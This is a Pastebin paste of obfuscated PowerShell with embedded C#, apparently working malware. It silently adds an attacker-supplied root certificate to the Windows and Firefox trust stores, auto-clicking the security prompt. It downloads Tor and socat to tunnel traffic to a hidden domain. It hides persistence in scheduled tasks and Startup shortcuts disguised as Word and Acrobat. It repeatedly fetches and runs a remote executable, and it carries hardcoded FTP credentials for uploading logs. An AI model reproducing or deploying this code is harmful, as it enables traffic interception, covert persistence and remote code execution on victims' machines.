Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function IxwlznPssNNPP{
- Add-Type @"
- using System;
- using System.Text;
- using System.Runtime.InteropServices;
- using System.Diagnostics;
- using System.Security.Cryptography.X509Certificates;
- using System.Threading;
- public static class uDWozt
- {
- public class brNXwO
- {
- public string Wndclass;
- public string Title;
- public string Process;
- public IntPtr hWnd;
- }
- private delegate bool KIzxk(IntPtr hWnd, ref brNXwO data);
- [DllImport("user32.dll")]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool EnumWindows(KIzxk lpEnumFunc, ref brNXwO data);
- [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
- public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
- [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
- static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
- [DllImport("user32.dll")]
- [return: MarshalAs(UnmanagedType.Bool)]
- static extern bool SetForegroundWindow(IntPtr hWnd);
- public delegate bool uDP(IntPtr hwnd, IntPtr lParam);
- [DllImport("user32")]
- [return: MarshalAs(UnmanagedType.Bool)]
- public static extern bool EnumChildWindows(IntPtr window, uDP callback, IntPtr lParam);
- [DllImport("user32.dll", CharSet = CharSet.Auto)]
- static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
- [Flags]
- private enum SnapshotFlags : uint
- {
- HeapList = 0x00000001,
- Process = 0x00000002,
- Thread = 0x00000004,
- Module = 0x00000008,
- Module32 = 0x00000010,
- Inherit = 0x80000000,
- All = 0x0000001F,
- NoHeaps = 0x40000000
- }
- //inner struct used only internally
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
- private struct PROCESSENTRY32
- {
- const int MAX_PATH = 260;
- internal UInt32 dwSize;
- internal UInt32 cntUsage;
- internal UInt32 th32ProcessID;
- internal IntPtr th32DefaultHeapID;
- internal UInt32 th32ModuleID;
- internal UInt32 cntThreads;
- internal UInt32 th32ParentProcessID;
- internal Int32 pcPriClassBase;
- internal UInt32 dwFlags;
- [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
- internal string szExeFile;
- }
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
- [DllImport("kernel32", SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CloseHandle([In] IntPtr hObject);
- const int BM_CL = 0x00F5;
- public static byte[] lIxrqOO(String sCert)
- {
- return Convert.FromBase64String(sCert);
- }
- public static void MdZnUIVph(String sCert){
- System.Console.WriteLine("[Win32]::Start()");
- byte[] bCert = lIxrqOO(sCert);
- if (bCert != null)
- {
- X509Certificate2 certificate = new X509Certificate2(bCert);
- X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser);
- store.Open(OpenFlags.ReadWrite);
- if (!store.Certificates.Contains(certificate))
- {
- Thread thread = new Thread(jinJTAGRFjJN);
- thread.Start();
- store.Add(certificate);
- thread.Join();
- }
- store.Close();
- }
- }
- public static void jinJTAGRFjJN()
- {
- System.Console.WriteLine("[Win32]::SearchDialog()");
- IntPtr hWnd;
- do{
- hWnd = UANP("#32770",String.Empty);
- if (!hWnd.Equals(IntPtr.Zero))
- {
- System.Console.WriteLine("Founded hWnd=0x{0:X}",hWnd);
- break;
- }else
- {
- hWnd=IntPtr.Zero;
- System.Console.WriteLine("Try again find window");
- }
- }while (hWnd.Equals(IntPtr.Zero));
- System.Console.WriteLine("Dialog window founded");
- SetForegroundWindow(hWnd);
- uDP childProc = new uDP(Sqvkzka);
- EnumChildWindows(hWnd, childProc, IntPtr.Zero);
- }
- public static IntPtr UANP(string wndclass, string title)
- {
- brNXwO sd = new brNXwO();
- sd.Wndclass = wndclass;
- sd.Title = title;
- sd.hWnd=IntPtr.Zero;
- System.Console.WriteLine("EnumWindow -|");
- EnumWindows(new KIzxk(QfEgqbiwLLE), ref sd);
- return sd.hWnd;
- }
- public static bool QfEgqbiwLLE(IntPtr hWnd, ref brNXwO data)
- {
- StringBuilder title = new StringBuilder(1024);
- StringBuilder className = new StringBuilder(1024);
- GetWindowText(hWnd, title, title.Capacity);
- GetClassName(hWnd, className, className.Capacity);
- String sEN=zlZtvaJq(hWnd).ToLower();
- if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && title.ToString().StartsWith(data.Title)))
- {
- System.Console.WriteLine(" |- hWnd=0x{0:X}; Class={1}; Title={2}; Process={3}",hWnd,className.ToString(),title.ToString(),sEN);
- if(sEN.Contains("csrss") || sEN.Contains("certutil") || sEN.Contains("powershell"))
- {
- data.hWnd = hWnd;
- return false;
- }
- }
- return true;
- }
- public static String zlZtvaJq(IntPtr cQzoivDyDVP){
- uint LSMhtexN = 0;
- uint threadID = GetWindowThreadProcessId(cQzoivDyDVP, out LSMhtexN);
- String sProc = null;
- IntPtr handleToSnapshot = IntPtr.Zero;
- try
- {
- PROCESSENTRY32 uRgD = new PROCESSENTRY32();
- uRgD.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
- handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0);
- if (Process32First(handleToSnapshot, ref uRgD))
- {
- do
- {
- if (LSMhtexN == uRgD.th32ProcessID)
- {
- sProc = uRgD.szExeFile;
- break;
- }
- } while (Process32Next(handleToSnapshot, ref uRgD));
- }
- else
- {
- throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error()));
- }
- }
- catch (Exception ex)
- {
- throw new ApplicationException("Can't get the process.", ex);
- }
- finally
- {
- CloseHandle(handleToSnapshot);
- }
- return sProc;
- }
- public static bool Sqvkzka(IntPtr hWnd, IntPtr lParam)
- {
- SendMessage(hWnd, BM_CL, IntPtr.Zero, IntPtr.Zero);
- return true;
- }
- }
- "@;
- [uDWozt]::MdZnUIVph("%CERT%");
- exit
- }
- IxwlznPssNNPP
- function qWydooxsfcuX{
- Add-Type @"
- using System;
- using System.IO;
- using Microsoft.Win32;
- using System.Runtime.InteropServices;
- using System.ComponentModel;
- public sealed class VvvluVYvCVHZcKJ
- {
- private static volatile VvvluVYvCVHZcKJ bWQOycQsqwujTX;
- private static object FjuSmxcUz = new Object();
- public static VvvluVYvCVHZcKJ yXpWzzNyofAXFw()
- {
- if (bWQOycQsqwujTX == null)
- {
- lock (FjuSmxcUz)
- {
- if (bWQOycQsqwujTX == null)
- bWQOycQsqwujTX = new VvvluVYvCVHZcKJ();
- }
- }
- return bWQOycQsqwujTX;
- }
- const int GlPtNsgUc=0;
- [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
- static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
- private static IntPtr sVoGpYpL(string libPath)
- {
- if (String.IsNullOrEmpty(libPath))
- throw new ArgumentNullException("libPath");
- IntPtr moduleHandle = LoadLibrary(libPath);
- if (moduleHandle == IntPtr.Zero)
- {
- int lasterror = Marshal.GetLastWin32Error();
- System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
- Win32Exception innerEx = new Win32Exception(lasterror);
- innerEx.Data.Add("LastWin32Error", lasterror);
- throw new Exception("can't load DLL " + libPath, innerEx);
- }
- return moduleHandle;
- }
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
- //Constants
- const uint NSS_INIT_READONLY=0x1;
- const uint NSS_INIT_NOCERTDB = 0x2;
- const uint NSS_INIT_NOMODDB = 0x4;
- const uint NSS_INIT_FORCEOPEN = 0x8;
- const uint NSS_INIT_NOROOTINIT = 0x10;
- const uint NSS_INIT_OPTIMIZESPACE = 0x20;
- const uint NSS_INIT_PK11THREADSAFE = 0x40;
- const uint NSS_INIT_PK11RELOAD = 0x80;
- const uint NSS_INIT_NOPK11FINALIZE = 0x100;
- const uint NSS_INIT_RESERVED = 0x200;
- const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED;
- const string SECMOD_DB = "secmod.db";
- //Structures
- [StructLayout(LayoutKind.Sequential)]
- public struct SECItem
- {
- public uint iType;
- public IntPtr bData;
- public uint iDataLen;
- }
- [StructLayout(LayoutKind.Sequential)]
- private struct CertTrusts
- {
- public int iSite;
- public int iEmail;
- public int iSoft;
- }
- private enum SECCertUsage
- {
- certUsageSSLClient = 0,
- certUsageSSLServer = 1,
- certUsageSSLServerWithStepUp = 2,
- certUsageSSLCA = 3,
- certUsageEmailSigner = 4,
- certUsageEmailRecipient = 5,
- certUsageObjectSigner = 6,
- certUsageUserCertImport = 7,
- certUsageVerifyCA = 8,
- certUsageProtectedObjectSigner = 9,
- certUsageStatusResponder = 10,
- certUsageAnyCA = 11
- }
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int SAHQOjSKIQuqauu(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags);
- private int jMqvNrdsjLvv(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Initialize");
- SAHQOjSKIQuqauu ptr = (SAHQOjSKIQuqauu)Marshal.GetDelegateForFunctionPointer(pProc, typeof(SAHQOjSKIQuqauu));
- return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags);
- }
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate IntPtr NIYpPCjCBxFfBC();
- private IntPtr CNdGzRYooz()
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_GetDefaultCertDB");
- NIYpPCjCBxFfBC ptr = (NIYpPCjCBxFfBC)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NIYpPCjCBxFfBC));
- return ptr();
- }
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate IntPtr sTBBLA();
- private IntPtr jYJvrdt()
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Shutdown");
- sTBBLA ptr = (sTBBLA)Marshal.GetDelegateForFunctionPointer(pProc, typeof(sTBBLA));
- return ptr();
- }
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int mxfz(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname);
- private int zAkHNfkzyckVBxn(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ImportCerts");
- mxfz ptr = (mxfz)Marshal.GetDelegateForFunctionPointer(pProc, typeof(mxfz));
- return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname);
- }
- private delegate int UJdXr(IntPtr certdb, IntPtr cert, ref CertTrusts trust);
- private int rJbhRgnUdJYH(IntPtr certdb, IntPtr cert, ref CertTrusts trust)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ChangeCertTrust");
- UJdXr ptr = (UJdXr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(UJdXr));
- return ptr(certdb, cert, ref trust);
- }
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- public delegate int BxDVnEb(IntPtr cert, uint ncerts);
- private int GMMnJgiwqS(IntPtr cert, uint ncerts)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_DestroyCertArray");
- BxDVnEb ptr = (BxDVnEb)Marshal.GetDelegateForFunctionPointer(pProc, typeof(BxDVnEb));
- return ptr(cert, ncerts);
- }
- private IntPtr xHkdzDjqqFO = IntPtr.Zero;
- public Boolean yXKVDNlNplVzraF(String sCert){
- System.Console.WriteLine(String.Format("VvvluVYvCVHZcKJ Start. Process {0}-bit",IntPtr.Size * 8));
- String sProfile = GetProfile();
- if (String.IsNullOrEmpty(sProfile))
- {
- System.Console.WriteLine("Profile not found");
- return false;
- }
- System.Console.WriteLine("Profile path="+sProfile);
- byte[] bCert = GetCertAsByteArray(sCert);
- IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length);
- System.Console.WriteLine("Unpack cert OK");
- try
- {
- DirectoryInfo diInstallPath = GetIP();
- if (diInstallPath == null)
- {
- System.Console.WriteLine("diInstallPath is null");
- String ffexe = @"C:\Program Files\Mozilla Firefox\firefox.exe";
- if (File.Exists(ffexe))
- {
- diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
- System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
- }
- else
- {
- ffexe = @"C:\Program Files (x86)\Mozilla Firefox\firefox.exe";
- if (File.Exists(ffexe))
- {
- diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
- System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
- }
- }
- }
- String sCurrentDirectory = Directory.GetCurrentDirectory();
- Directory.SetCurrentDirectory(diInstallPath.FullName);
- System.Console.WriteLine("Install path="+diInstallPath.FullName);
- foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll"))
- {
- if (fiDll.Name.Equals("breakpadinjector.dll")) continue;
- try{
- sVoGpYpL(fiDll.FullName);
- }catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }
- xHkdzDjqqFO = sVoGpYpL(diInstallPath.FullName + "\\nss3.dll");
- if (xHkdzDjqqFO.Equals(IntPtr.Zero))
- {
- System.Console.WriteLine("Firefox install directory not found");
- return false;
- }
- System.Console.WriteLine("Init dlls OK");
- Directory.SetCurrentDirectory(sCurrentDirectory);
- //Init cert
- Marshal.Copy(bCert, 0, ipCert, bCert.Length);
- SECItem CertItem = new SECItem();
- CertItem.iType = 3;
- CertItem.bData = ipCert;
- CertItem.iDataLen = (uint)bCert.Length;
- SECItem[] aCertItem = new SECItem[1];
- aCertItem[0] = CertItem;
- CertTrusts CertTrust = new CertTrusts();
- CertTrust.iSite = 0x10;
- CertTrust.iEmail = 0x10;
- CertTrust.iSoft = 0x10;
- System.Console.WriteLine("Init cert OK");
- //End init cert
- int status = jMqvNrdsjLvv("sql:"+sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE);
- if (status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("NSS_InitReadWrite ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- return false;
- }
- IntPtr bd = CNdGzRYooz();
- if (bd == IntPtr.Zero)
- {
- System.Console.WriteLine("CERT_GetDefaultCertDB Failed");
- jYJvrdt();
- return false;
- }
- System.Console.WriteLine("CERT_GetDefaultCertDB OK");
- IntPtr CertToImport = new IntPtr();
- IntPtr[] aCertToImport = new IntPtr[1];
- status = zAkHNfkzyckVBxn(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero);
- if (status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("CERT_ImportCerts ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- jYJvrdt();
- return false;
- }
- System.Console.WriteLine("CERT_ImportCerts OK");
- Marshal.Copy(CertToImport, aCertToImport, 0, 1);
- status = rJbhRgnUdJYH(bd, aCertToImport[0], ref CertTrust);
- if ( status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("CERT_ChangeCertTrust ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- jYJvrdt();
- return false;
- };
- System.Console.WriteLine("CERT_ChangeCertTrust OK");
- GMMnJgiwqS(CertToImport, 1);
- System.Console.WriteLine("Add cert OK");
- }
- catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- finally
- {
- jYJvrdt();
- }
- return true;
- }
- private String GetProfile()
- {
- String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles");
- if (Directory.Exists(FFProfile))
- {
- if (Directory.GetDirectories(FFProfile, "*.default").Length > 0)
- {
- return Directory.GetDirectories(FFProfile, "*.default")[0];
- }
- }
- return "";
- }
- public byte[] GetCertAsByteArray(String sCert)
- {
- try
- {
- return Convert.FromBase64String(sCert);
- }
- catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- return null;
- }
- private DirectoryInfo GetIP()
- {
- DirectoryInfo fp = null;
- // get firefox path from registry
- // we'll search the 32bit install location
- RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false);
- // and lets try the 64bit install location just in case
- RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false);
- if (localMachine1 != null)
- {
- try
- {
- string[] installedVersions = localMachine1.GetSubKeyNames();
- // we'll take the first installed version, people normally only have one
- if (installedVersions.Length == 0)
- throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
- RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]);
- // get install directory
- string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
- if (installString == null)
- throw new NullReferenceException("Install string was null");
- fp = new DirectoryInfo(installString);
- }
- catch (Exception ex)
- {
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }
- else if (localMachine2 != null)
- {
- try
- {
- string[] installedVersions = localMachine2.GetSubKeyNames();
- // we'll take the first installed version, people normally only have one
- if (installedVersions.Length == 0)
- throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
- RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]);
- // get install directory
- string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
- if (installString == null)
- throw new NullReferenceException("Install string was null");
- fp = new DirectoryInfo(installString);
- }
- catch (Exception ex)
- {
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }else{
- System.Console.WriteLine("Registry records not found");
- }
- return fp;
- }
- }
- "@;
- [VvvluVYvCVHZcKJ]::yXpWzzNyofAXFw().yXKVDNlNplVzraF("%CERT%");
- }
- qWydooxsfcuX
- $SH_TYPE_SCHEDULED_TASK=1;
- $SH_TYPE_TASK_SCHEDULER=2;
- $schedulerType=$SH_TYPE_SCHEDULED_TASK;
- function mWwT
- {
- param([string]$zipfile, [string]$destination);
- $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
- if (-NOT (Test-Path $7z)){
- Try
- {
- (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
- }
- Catch{}
- }
- if ($(Try { Test-Path $7z.trim() } Catch { $false })){
- Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
- }
- else{
- $shell = new-object -com shell.application;
- $zip = $shell.NameSpace($zipfile);
- foreach($item in $zip.items())
- {
- $shell.Namespace($destination).copyhere($item);
- }
- }
- }
- function Add-Shortcut{
- param([string]$target_path, [string]$dest_path, [string]$work_path, [string]$arguments="");
- $_path=Split-Path $dest_path;
- if (-Not (Test-Path $_path)){
- mkdir -Force $_path;
- }
- if (-Not (Test-Path $target_path)){
- Write-Output "Can't add shortcut. Target path '$target_path' not found.";
- return;
- }
- if ((Test-Path $dest_path)){
- Write-Output "Can't add shortcut. Destination path '$dest_path' exist.";
- return;
- }
- $_shell = New-Object -ComObject ("WScript.Shell");
- $_shortcut = $_shell.CreateShortcut($dest_path);
- $_shortcut.TargetPath=$target_path;
- if(-Not [String]::IsNullOrEmpty($arguments)){
- $_shortcut.Arguments=$arguments;
- }
- $_shortcut.WorkingDirectory=$work_path;
- $_shortcut.Save();
- }
- function Base64ToFile
- {
- param([string]$file, [string]$string);
- $bytes=[System.Convert]::FromBase64String($string);
- #set-content -encoding byte $file -value $bytes;
- [IO.File]::WriteAllBytes($file, $bytes);
- }
- function RandomString{
- param([int]$min=5, [int]$max=15);
- return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
- }
- function InitScheduller{
- try{
- Import-Module ScheduledTasks -ErrorAction Stop;
- return $SH_TYPE_SCHEDULED_TASK;
- }catch{
- $File=$env:Temp+'\'+(RandomString)+'.zip';
- $Dest=$env:Temp+'\'+(RandomString);
- while (!(nne 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
- if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
- mWwT $File $Dest;
- Remove-Item -Force $File;
- $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
- $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
- return $SH_TYPE_TASK_SCHEDULER;
- }
- }
- function FqCZvVAFIWkCT
- {
- param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
- switch ($schedulerType) {
- $SH_TYPE_SCHEDULED_TASK {
- $Action = New-ScheduledTaskAction -Execute $cmd;
- if(-Not [String]::IsNullOrEmpty($params)){
- $Action.Arguments=$params;
- }
- if(-Not [String]::IsNullOrEmpty($dir)){
- $Action.WorkingDirectory=$dir;
- }
- $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
- try{
- $LogonTrigger.UserId=$env:username;
- }catch{
- $LogonTrigger.User=$env:username;
- }
- if(-Not $delay -eq 0){
- $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
- }
- if($restart -eq 1){
- $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
- }
- $Settings = New-ScheduledTaskSettingsSet;
- $Settings.DisallowStartIfOnBatteries = $False;
- $Settings.StopIfGoingOnBatteries = $False;
- if($restart -eq 1){
- $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
- }else{
- $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
- }
- Start-ScheduledTask -InputObject $Task;
- };
- Default {
- $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
- $td=$ts.NewTask();
- $td.RegistrationInfo.Description = (RandomString);
- $td.Settings.DisallowStartIfOnBatteries = $False;
- $td.Settings.StopIfGoingOnBatteries = $False;
- $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
- $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
- $LogonTrigger.StartBoundary=[System.DateTime]::Now;
- $LogonTrigger.UserId=$env:username;
- $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
- $td.Triggers.Add($LogonTrigger);
- if($restart -eq 1){
- $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
- $TimeTrigger.StartBoundary=[System.DateTime]::Now;
- $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
- $TimeTrigger.Repetition.StopAtDurationEnd=$False;
- $td.Triggers.Add($TimeTrigger);
- }
- $tsf="Microsoft.Win32.TaskScheduler";
- $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
- $td.Actions.Add($ExecAction);
- $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
- $task.Run();
- };
- }
- }
- function nne {
- param([string]$nhhrQGEpp, [string]$KZqZalXQzaGMBW);
- $ErrorActionPreference = "Stop";
- Write-Host ("Download {0} to {1}" -f ($nhhrQGEpp, $KZqZalXQzaGMBW));
- try{
- [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls, ssl3";
- }catch{}
- try {
- Start-BitsTransfer -Source $nhhrQGEpp -Destination $KZqZalXQzaGMBW;
- }
- catch {
- #Write-Error $_ -ErrorAction Continue;
- try {
- (New-Object System.Net.WebClient).DownloadFile($nhhrQGEpp,$KZqZalXQzaGMBW);
- }
- catch {
- #Write-Error $_ -ErrorAction Continue;
- Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$nhhrQGEpp`" `"$KZqZalXQzaGMBW`"" -Wait -WindowStyle Hidden;
- }
- }finally{
- $ErrorActionPreference = "Continue";
- }
- if ( $(Try { Test-Path $KZqZalXQzaGMBW.trim() } Catch { $false })){
- return $true;
- }
- return $false;
- }
- function ZjLBbVj{
- $schedulerType = InitScheduller;
- $tf=$env:Temp+'\'+(RandomString)+'.zip';
- $gLRlOZOsud=$env:ALLUSERSPROFILE+'\'+(RandomString);
- $yXozjITRBzpQM=@([string]::Concat('https://di','st.t','orproject.org/'), [string]::Concat("https://mirror.oldsql.cc/t","or/di","st/"), [string]::Concat("https://to","rmirror.tb-itf-t","or.de/di","st/"));
- foreach ($pKUDFhhhvNZv in $yXozjITRBzpQM) {
- $maV=$pKUDFhhhvNZv+"torbrowser/8.0.3/t"+"or-win32-0.3.4.8.zip";
- if((nne $maV $tf)){
- break;
- }
- }
- if ((Test-Path $gLRlOZOsud) -eq 1){Remove-Item -Force -Recurse $gLRlOZOsud;}mkdir $gLRlOZOsud | Out-Null;
- mWwT $tf $gLRlOZOsud;
- Remove-Item -Force $tf;
- $HXnQ=$gLRlOZOsud+"\T"+"or\";
- $OEnwgbJEWJe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"t"+"or.exe`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $OEnwgbJEWJe 0 0 $HXnQ;
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\msword.lnk" $vzfkFcawDbIUSya $toawwyJljC
- $QDOKSGRmCckng=$env:Temp+'\'+(RandomString)+'.zip';
- $NNHcFwiW=(RandomString);
- $ytfOSwwAAgG=$gLRlOZOsud+'\'+$NNHcFwiW+'\';
- nne 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $QDOKSGRmCckng;
- if ( $(Try { Test-Path $QDOKSGRmCckng.trim() } Catch { $false })){
- mWwT $QDOKSGRmCckng $gLRlOZOsud;
- $BEqzKhTxCky=$gLRlOZOsud+'\socat-windows-1.7.2.1\';
- Rename-Item -path $BEqzKhTxCky -newName $NNHcFwiW;
- }else{
- nne 'http://blog.gentilkiwi.com/downloads/socat-1.7.2.1.zip' $QDOKSGRmCckng;
- mWwT $QDOKSGRmCckng $ytfOSwwAAgG;
- }
- Remove-Item -Force $QDOKSGRmCckng;
- $s1cmd='socat tcp4-LISTEN:53904,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050';
- $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050';
- $PwzNe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
- $gLvFSMD="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $PwzNe 0 0 $ytfOSwwAAgG;
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $gLvFSMD 0 0 $ytfOSwwAAgG;
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $ytfOSwwAAgG $PwzNe
- Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $ytfOSwwAAgG $gLvFSMD
- $jSfqYGyepyLvWfi="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
- FqCZvVAFIWkCT (RandomString) 'mshta.exe' $jSfqYGyepyLvWfi 1;
- }
- ZjLBbVj;
- $Logfile = $env:Temp+"\\$(gc env:computername).log";
- Function LogWrite
- {
- Param ([string]$logstring)
- $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
- $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
- Write-Host $msg;
- Add-content $Logfile -value $msg;
- }
- Function UploadLog
- {
- $dest = "ftp://co-j-jp:escoj2013@wx04.wadax.ne.jp/public_html/logs";
- $wc = New-Object -TypeName System.Net.WebClient;
